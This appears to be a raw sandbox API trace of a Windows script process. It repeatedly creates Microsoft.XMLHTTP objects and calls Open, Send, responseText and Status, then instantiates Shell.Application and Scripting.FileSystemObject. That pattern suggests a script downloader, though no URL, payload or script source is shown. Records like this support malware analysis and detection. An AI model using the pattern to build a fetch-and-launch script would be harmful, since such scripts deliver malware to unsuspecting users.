	[0322.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0322.189] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0322.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.190] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.190] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.190] SysStringLen (param_1=0x0) returned 0x0
	[0322.190] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0322.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0322.190] ??2@YAPEAX_K@Z () returned 0x62f310
	[0322.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f310) 
	[0322.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.190] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0322.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0322.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0322.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.191] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.191] longjmp () 
	[0322.191] longjmp () 
	[0322.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.193] SysStringLen (param_1=0x0) returned 0x0
	[0322.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0322.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0322.193] ??2@YAPEAX_K@Z () returned 0x62f330
	[0322.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0322.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.193] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0322.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0322.193] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0322.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.193] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.194] longjmp () 
	[0322.194] longjmp () 
	[0322.194] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0322.194] SysStringLen (param_1=0x0) returned 0x0
	[0322.194] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0322.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0322.194] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7290) returned 0x0
	[0322.194] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0322.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72f8) returned 0x0
	[0322.194] ??2@YAPEAX_K@Z () returned 0x62f310
	[0322.194] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72f8, pUnkSite=0x62f310) 
	[0322.194] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0322.194] XMLHTTPRequest:IUnknown:Release (This=0x49c72f8) returned 0x0
	[0322.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7290) returned 0x0
	[0322.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7290) returned 0x3
	[0322.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0322.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0322.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0322.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0322.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0323.938] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0323.938] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0323.938] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0323.938] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0323.939] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0323.939] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0323.939] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0323.939] SysStringLen (param_1=0x0) returned 0x0
	[0323.939] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0323.939] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0323.939] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef910) returned 0x0
	[0323.939] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0323.939] Shell:IUnknown:QueryInterface (in: This=0x64ef910, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef950) returned 0x0
	[0323.939] ??2@YAPEAX_K@Z () returned 0x62f350
	[0323.939] Shell:IObjectWithSite:SetSite (This=0x64ef950, pUnkSite=0x62f350) returned 0x0
	[0323.939] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0323.939] Shell:IUnknown:Release (This=0x64ef950) returned 0x1
	[0323.939] Shell:IUnknown:QueryInterface (in: This=0x64ef910, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef910) returned 0x0
	[0323.939] Shell:IUnknown:AddRef (This=0x64ef910) returned 0x3
	[0323.940] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0323.940] SysStringLen (param_1=0x0) returned 0x0
	[0323.940] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0323.942] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0323.943] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0323.943] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0323.943] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0323.943] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0323.943] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0324.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0324.662] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7290, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0324.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0324.663] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0324.663] SysStringLen (param_1=0x0) returned 0x0
	[0324.663] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0324.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0324.664] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7290) returned 0x0
	[0324.664] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0324.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7290, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0324.664] ??2@YAPEAX_K@Z () returned 0x62f310
	[0324.664] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0324.664] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0324.664] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
